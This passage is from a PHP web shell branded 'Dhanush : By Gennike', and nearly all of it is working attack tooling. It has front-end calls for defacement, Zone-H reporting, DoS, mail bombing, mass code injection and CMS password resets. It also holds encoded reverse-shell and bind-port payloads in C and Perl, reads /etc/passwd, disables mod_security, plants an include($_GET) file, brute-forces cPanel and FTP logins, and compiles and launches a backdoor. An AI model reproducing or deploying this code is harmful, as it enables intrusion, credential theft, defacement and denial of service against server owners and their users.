  5147. {
  5148. var domain = encodeURIComponent(domain);
  5149. var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
  5150. document.getElementById("showzone").innerHTML=waitstate;
  5151. var ajaxRequest;
  5152. ajaxRequest = new XMLHttpRequest();
  5154. ajaxRequest.onreadystatechange = function()
  5155. {
  5156. if(ajaxRequest.readyState == 4)
  5157. {
  5158. document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
  5159. }
  5160. }
  5162."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5163. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5164. ajaxRequest.send(params);
  5165. }
  5166. function savemyfile(file,content)
  5167. {
  5168. var content = encodeURIComponent(content);
  5169. var params = "content="+content+"&file="+file;
  5170. document.getElementById("showmydata").innerHTML=waitstate;
  5171. var ajaxRequest;
  5172. ajaxRequest = new XMLHttpRequest();
  5174. ajaxRequest.onreadystatechange = function()
  5175. {
  5176. if(ajaxRequest.readyState == 4)
  5177. {
  5178. document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
  5179. }
  5180. }
  5182."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5183. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5184. ajaxRequest.send(params);
  5185. }
  5186. function renamefun(file,to)
  5187. {
  5188. document.getElementById("showmydata").innerHTML=waitstate;
  5189. var ajaxRequest;
  5190. ajaxRequest = new XMLHttpRequest();
  5192. ajaxRequest.onreadystatechange = function()
  5193. {
  5194. if(ajaxRequest.readyState == 4)
  5195. {
  5196. document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
  5197. }
  5198. }
  5200."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
  5201. ajaxRequest.send(null);
  5202. }
  5203. function changeperms(chmode,myfilename)
  5204. {
  5205. document.getElementById("showmydata").innerHTML=waitstate;
  5206. var ajaxRequest;
  5207. ajaxRequest = new XMLHttpRequest();
  5209. ajaxRequest.onreadystatechange = function()
  5210. {
  5211. if(ajaxRequest.readyState == 4)
  5212. {
  5213. document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
  5214. }
  5215. }
  5217."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
  5218. ajaxRequest.send(null);
  5219. }
  5220. function defacefun(deface)
  5221. {
  5222. var ajaxRequest;
  5223. ajaxRequest = new XMLHttpRequest();
  5225. ajaxRequest.onreadystatechange = function()
  5226. {
  5227. if(ajaxRequest.readyState == 4)
  5228. {
  5229. alert(ajaxRequest.responseText);
  5230. }
  5231. }
  5233."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
  5234. ajaxRequest.send(null);
  5235. }
  5236. function fileaction(myaction,myfilepath)
  5237. {
  5238. document.getElementById("showmydata").innerHTML=waitstate;
  5239. var ajaxRequest;
  5240. ajaxRequest = new XMLHttpRequest();
  5242. ajaxRequest.onreadystatechange = function()
  5243. {
  5244. if(ajaxRequest.readyState == 4)
  5245. {
  5246. document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
  5247. }
  5248. }
  5250."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
  5251. ajaxRequest.send(null);
  5252. }
  5253. function bypassfun(funct,functvalue,optiontype)
  5254. {
  5255. document.getElementById("showbyp").innerHTML=waitstate;
  5256. var ajaxRequest;
  5257. ajaxRequest = new XMLHttpRequest();
  5259. ajaxRequest.onreadystatechange = function()
  5260. {
  5261. if(ajaxRequest.readyState == 4)
  5262. {
  5263. document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
  5264. }
  5265. }
  5267."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
  5268. ajaxRequest.send(null);
  5269. }
  5270. function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
  5271. {
  5272. document.getElementById("showdos").innerHTML=waitstate;
  5273. var ajaxRequest;
  5274. ajaxRequest = new XMLHttpRequest();
  5276. ajaxRequest.onreadystatechange = function()
  5277. {
  5278. if(ajaxRequest.readyState == 4)
  5279. {
  5280. document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
  5281. }
  5282. }
  5284."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
  5285. ajaxRequest.send(null);
  5286. }
  5287. function createfile(filecreator,filecontent)
  5288. {
  5289. var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
  5290. var filecontent = encodeURIComponent(filecontent);
  5291. var params = "filecontent="+filecontent+"&filecreator="+filecreator;
  5292. document.getElementById("showdir").innerHTML=waitstate;
  5293. var ajaxRequest;
  5294. ajaxRequest = new XMLHttpRequest();
  5296. ajaxRequest.onreadystatechange = function()
  5297. {
  5298. if(ajaxRequest.readyState == 4)
  5299. {
  5300. gethome('home',mm);
  5301. document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
  5302. }
  5303. }
  5305."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5306. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5307. ajaxRequest.send(params);
  5308. }
  5309. function createdir(create,createfolder)
  5310. {
  5311. document.getElementById("showdir").innerHTML=waitstate;
  5312. var ajaxRequest;
  5313. ajaxRequest = new XMLHttpRequest();
  5315. ajaxRequest.onreadystatechange = function()
  5316. {
  5317. if(ajaxRequest.readyState == 4)
  5318. {
  5319. document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
  5320. }
  5321. }
  5323."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
  5324. ajaxRequest.send(null);
  5325. }
  5326. function codeinsert(code)
  5327. {
  5328. var code = encodeURIComponent(code);
  5329. var params = "getcode="+code;
  5330. document.getElementById("showcode").innerHTML=waitstate;
  5331. var ajaxRequest;
  5332. ajaxRequest = new XMLHttpRequest();
  5334. ajaxRequest.onreadystatechange = function()
  5335. {
  5336. if(ajaxRequest.readyState == 4)
  5337. {
  5338. document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
  5339. }
  5340. }
  5342."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5343. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5344. ajaxRequest.send(params);
  5345. }
  5346. function getmydata(mydata)
  5347. {
  5348. document.getElementById("showmydata").innerHTML=waitstate;
  5349. var ajaxRequest;
  5350. ajaxRequest = new XMLHttpRequest();
  5352. ajaxRequest.onreadystatechange = function()
  5353. {
  5354. if(ajaxRequest.readyState == 4)
  5355. {
  5356. document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
  5357. }
  5358. }
  5360."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
  5361. ajaxRequest.send(null);
  5362. }
  5363. function getdata(mydata,myfile)
  5364. {
  5365. document.getElementById("showdata").innerHTML=waitstate;
  5366. var ajaxRequest;
  5367. ajaxRequest = new XMLHttpRequest();
  5369. ajaxRequest.onreadystatechange = function()
  5370. {
  5371. if(ajaxRequest.readyState == 4)
  5372. {
  5373. document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
  5374. }
  5375. }
  5377."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
  5378. ajaxRequest.send(null);
  5379. }
  5380. function getport(host,protocol,start,end)
  5381. {
  5382. document.getElementById("showports").innerHTML=waitstate;
  5383. var ajaxRequest;
  5384. ajaxRequest = new XMLHttpRequest();
  5386. ajaxRequest.onreadystatechange = function()
  5387. {
  5388. if(ajaxRequest.readyState == 4)
  5389. {
  5390. document.getElementById("showports").innerHTML=ajaxRequest.responseText;
  5391. }
  5392. }
  5394."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
  5395. ajaxRequest.send(null);
  5396. }
  5397. function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
  5398. {
  5399. document.getElementById("showchangepass").innerHTML=waitstate;
  5400. var ajaxRequest;
  5401. ajaxRequest = new XMLHttpRequest();
  5403. ajaxRequest.onreadystatechange = function()
  5404. {
  5405. if(ajaxRequest.readyState == 4)
  5406. {
  5407. document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
  5408. }
  5409. }
  5411."GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
  5412. ajaxRequest.send(null);
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  5418. document.getElementById("showdeface").innerHTML=waitstate;
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  5420. ajaxRequest = new XMLHttpRequest();
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  5423. {
  5424. if(ajaxRequest.readyState == 4)
  5425. {
  5426. document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
  5427. }
  5428. }
  5430."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5431. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5432. ajaxRequest.send(params);
  5433. }
  5434. function codeinjector(pathtomass,mode,filetype,injectthis)
  5435. {
  5436. var injectthis = encodeURIComponent(injectthis);
  5437. var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
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  5439. var ajaxRequest;
  5440. ajaxRequest = new XMLHttpRequest();
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  5443. {
  5444. if(ajaxRequest.readyState == 4)
  5445. {
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  5447. }
  5448. }
  5450."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
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  5452. ajaxRequest.send(params);
  5453. }
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  5458. var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
  5459. else if(mailfunction == "dobombing")
  5460. var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&times=" + times + "&padding=" + padding + "&message=" + message;
  5461. document.getElementById("showmail").innerHTML=waitstate;
  5462. var ajaxRequest;
  5463. ajaxRequest = new XMLHttpRequest();
  5465. ajaxRequest.onreadystatechange = function()
  5466. {
  5467. if(ajaxRequest.readyState == 4)
  5468. {
  5469. document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
  5470. }
  5471. }
  5473."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
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  5478. {
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  5480. var message = encodeURIComponent(message);
  5481. var params = "code="+code+"&intext="+intext;
  5482. document.getElementById("showresult").innerHTML=waitstate;
  5483. var ajaxRequest;
  5484. ajaxRequest = new XMLHttpRequest();
  5486. ajaxRequest.onreadystatechange = function()
  5487. {
  5488. if(ajaxRequest.readyState == 4)
  5489. {
  5490. document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
  5491. }
  5492. }
  5494."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5495. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5496. ajaxRequest.send(params);
  5497. }
  5498. function malwarefun(malwork)
  5499. {
  5500. var malpath = document.getElementById('createfile').value;
  5501. document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
  5502. var ajaxRequest;
  5503. ajaxRequest = new XMLHttpRequest();
  5505. ajaxRequest.onreadystatechange = function()
  5506. {
  5507. if(ajaxRequest.readyState == 4)
  5508. {
  5509. document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
  5510. }
  5511. }
  5513."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
  5514. ajaxRequest.send(null);
  5515. }
  5516. function getexploit(wurl,path,functiontype)
  5517. {
  5518. document.getElementById("showexp").innerHTML=waitstate;
  5519. var ajaxRequest;
  5520. ajaxRequest = new XMLHttpRequest();
  5522. ajaxRequest.onreadystatechange = function()
  5523. {
  5524. if(ajaxRequest.readyState == 4)
  5525. {
  5526. document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
  5527. }
  5528. }
  5530."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
  5531. ajaxRequest.send(null);
  5532. }
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  5546. document.getElementById('joomla').style.display='none';
  5547. document.getElementById('fid').style.display='block';
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  5550. {
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  5564. {
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  5568. document.getElementById('fid').style.display='none';
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  5572. }
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  5576. {
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  5579. document.getElementById('myjoomla').style.display='none';
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  5582. if(msg == 'phpbb')
  5583. {
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  5585. document.getElementById('myjoomla').style.display='none';
  5586. document.getElementById('smfipb').style.display='block';
  5587. document.getElementById('wordpres').style.display='none';
  5588. }
  5589. if(msg == 'mybb')
  5590. {
  5591. document.getElementById('tableprefix').value="mybb_";
  5592. document.getElementById('myjoomla').style.display='none';
  5593. document.getElementById('smfipb').style.display='none';
  5594. }
  5595. if(msg == 'vb')
  5596. {
  5597. document.getElementById('tableprefix').value="";
  5598. document.getElementById('myjoomla').style.display='none';
  5599. document.getElementById('smfipb').style.display='none';
  5600. }
  5601. if(msg == 'ipb')
  5602. {
  5603. document.getElementById('myjoomla').style.display='none';
  5604. document.getElementById('smfipb').style.display='block';
  5605. document.getElementById('tableprefix').value="";
  5606. document.getElementById('wordpres').style.display='none';
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  5610. {
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  5613. document.getElementById('smfipb').style.display='block';
  5614. document.getElementById('wordpres').style.display='block';
  5615. }
  5616. if(msg == 'joomla')
  5617. {
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  5620. document.getElementById('smfipb').style.display='none';
  5622. }
  5623. }
  5624. </script>
  5625. <body>
  5626. <?php
  5628. $back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
  5630. $backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
  5632. $bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
  5634. $bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
  5635. shellstyle();
  5636. ?>
  5637. <div align="center">
  5638. <a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Gennike </font></a>
  5640. </div>
  5641. <hr color="#1B1B1B">
  5643. <table cellpadding="0" style="width:100%;">
  5644. <tr>
  5645. <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
  5646. <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
  5647. <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
  5648. </tr>
  5649. <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
  5650. <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
  5651. <?php $d0mains = @file("/etc/named.conf");
  5652. $users=@file('/etc/passwd');
  5653. if($d0mains)
  5654. {
  5655. $count;
  5656. foreach($d0mains as $d0main)
  5657. {
  5658. if(@ereg("zone",$d0main))
  5659. {
  5660. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  5661. flush();
  5662. if(strlen(trim($domains[1][0])) > 2)
  5663. {
  5664. flush();
  5665. $count++;
  5666. }
  5667. }
  5668. }
  5669. ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
  5670. }
  5671. else if($users)
  5672. {
  5673. $file = fopen("/etc/passwd", "r");
  5674. while(!feof($file))
  5675. {
  5676. $s = fgets($file);
  5677. $matches = array();
  5678. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  5679. $matches = str_replace("home/","",$matches[1]);
  5680. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  5681. continue;
  5682. $count++;
  5683. }
  5684. ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
  5685. </tr><?php } ?>
  5686. <tr>
  5687. <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
  5688. <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
  5690. <td style="width:20%;">Server IP : <font class="txt"><a href="<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
  5691. <td style="width:15%;">Your IP : <font class="txt"><a href="<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
  5692. </tr>
  5694. <tr>
  5695. <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
  5696. <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
  5697. <?php
  5698. $d = str_replace("\\",$directorysperator,$dir);
  5699. if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
  5700. $d = str_replace("\\\\","\\",$d);
  5701. $dispd = htmlspecialchars($d);
  5702. $pd = $e = explode($directorysperator,substr($d,0,-1));
  5703. $i = 0;
  5704. foreach($pd as $b)
  5705. {
  5706. $t = '';
  5707. $j = 0;
  5708. foreach ($e as $r)
  5709. {
  5710. $t.= $r.$directorysperator;
  5711. if ($j == $i) {break;}
  5712. $j++;
  5713. }
  5714. $href=addslashes($t);
  5716. echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
  5717. $i++;
  5718. }
  5720. ?>
  5721. </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
  5722. <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
  5723. <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
  5724. <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
  5725. </tr>
  5726. </table>
  5728. <?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
  5729. $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
  5730. echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
  5731. <tr>";
  5732. $menu = '';
  5734. foreach($m1 as $k => $v)
  5735. $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
  5736. echo $menu;
  5737. echo "</tr>
  5738. </table>
  5739. <div style=\"float:left;\">
  5740. <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>&nbsp;
  5741. <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>&nbsp;
  5742. <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
  5743. <table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
  5744. <tr align=center>";
  5745. foreach($m2 as $k => $v)
  5746. $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
  5747. echo $menu1;
  5748. echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
  5749. <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
  5750. </tr>
  5751. </table>";?>
  5753. <div id="showmaindata"></div>
  5754. <?php
  5756. if(isset($_GET["downloadit"]))
  5757. {
  5758. $FolderToCompress = getcwd();
  5759. execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
  5761. $prd=explode("/","backup.tar");
  5762. for($i=0;$i<sizeof($prd);$i++)
  5763. {
  5764. $nfd=$prd[$i];
  5765. }
  5766. @ob_clean();
  5767. header("Content-type: application/octet-stream");
  5768. header("Content-length: ".filesize($nfd));
  5769. header("Content-disposition: attachment; filename=\"".$nfd."\";");
  5770. readfile($nfd);
  5771. exit;
  5772. }
  5773. //Turn Safe Mode Off
  5775. if(getDisabledFunctions() != "None" || safe() != "OFF")
  5776. {
  5777. $file_pointer = fopen(".htaccess", "w+");
  5778. fwrite($file_pointer, "<IfModule mod_security.c>
  5779. SecFilterEngine Off
  5780. SecFilterScanPOST Off
  5781. </IfModule> \n\r");
  5783. $file_pointer = fopen("ini.php", "w+");
  5784. fwrite($file_pointer, "<?
  5785. echo ini_get(\"safe_mode\");
  5786. echo ini_get(\"open_basedir\");
  5787. include(\$_GET[\"file\"]);
  5788. ini_restore(\"safe_mode\");
  5789. ini_restore(\"open_basedir\");
  5790. echo ini_get(\"safe_mode\");
  5791. echo ini_get(\"open_basedir\");
  5792. include(\$_GET[\"ss\"]);
  5793. ?>");
  5795. $file_pointer = fopen("php.ini", "w+");
  5796. fwrite($file_pointer, "safe_mode = Off");
  5798. fclose($file_pointer);
  5800. }
  5802. else if(isset($_POST['cpanelattack']))
  5803. {
  5804. if(!empty($_POST['username']) && !empty($_POST['password']))
  5805. {
  5806. $userlist=explode("\n",$_POST['username']);
  5807. $passlist=explode("\n",$_POST['password']);
  5809. if($_POST['cracktype'] == "ftp")
  5810. {
  5811. foreach ($userlist as $user)
  5812. {
  5813. $pureuser = trim($user);
  5814. foreach ($passlist as $password )
  5815. {
  5816. $purepass = trim($password);
  5817. ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  5818. }
  5819. }
  5820. }
  5821. if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  5822. {
  5823. if($cracktype == "telnet")
  5824. $cpanel_port="23";
  5825. else
  5826. $cpanel_port="2082";
  5827. foreach ($userlist as $user)
  5828. {
  5829. $pureuser = trim($user);
  5831. echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  5832. Processing user $pureuser ...</font></b><br><br>";
  5834. foreach ($passlist as $password )
  5835. {
  5836. $purepass = trim($password);
  5837. cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  5839. }
  5840. }
  5841. }
  5842. }
  5843. else
  5844. $bdmessage = "<center>Enter Username & Password List<center>";
  5845. }
  5847. else if(isset($_GET['info']))
  5848. {
  5849. $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
  5850. }
  5851. else if(isset($_POST['u']))
  5852. {
  5853. $path = $_REQUEST['path'];
  5854. if(is_dir($path))
  5855. {
  5856. $setuploadvalue = 0;
  5857. $uploadedFilePath = $_FILES['uploadfile']['name'];
  5858. $tempName = $_FILES['uploadfile']['tmp_name'];
  5859. if($os == "Windows")
  5860. $uploadPath = $path . $directorysperator . $uploadedFilePath;
  5861. else if($os == "Linux")
  5862. $uploadPath = $path . $directorysperator . $uploadedFilePath;
  5863. if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
  5864. $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
  5865. else
  5866. $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
  5867. }
  5868. ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
  5869. }
  5870. else if(isset($_POST['backdoor']))
  5871. {
  5872. if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
  5873. { ?><script type="text/javascript">gethome('connect');</script><?php
  5874. $passwd = $_POST['passwd'];
  5876. if($_POST['lang'] == 'c')
  5877. {
  5878. if(is_writable("."))
  5879. {
  5880. @$fh=fopen(getcwd()."/backp.c",'w');
  5881. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
  5882. @fclose($fh);
  5883. execmd("chmod 0755 ".getcwd()."/backp.c");
  5884. execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
  5885. execmd("chmod 0755 ".getcwd()."/backp");
  5886. execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
  5887. $scan = exec_all("ps aux | grep backp".$_POST['port']);
  5888. if(eregi("backp".$_POST['port'],$scan))
  5889. $bdmessage = "Process found running, backdoor setup successfully.";
  5890. else
  5891. $bdmessage = "Process not found running, backdoor not setup successfully.";
  5892. }
  5893. else
  5894. {
  5895. @$fh=fopen("/tmp/backp.c","w");
  5896. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
  5897. @fclose($fh);
  5898. execmd("chmod 0755 /tmp/backp.c");
  5899. execmd("gcc -o /tmp/backp /tmp/backp.c");
  5900. $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
  5901. $scan = exec_all("ps aux | grep backp".$_POST['port']);
  5902. if(eregi("backp".$_POST['port'],$scan))
  5903. $bdmessage = "Process found running, backdoor setup successfully.";
  5904. else
  5905. $bdmessage = "Process not found running, backdoor not setup successfully.";
  5906. }
  5907. }
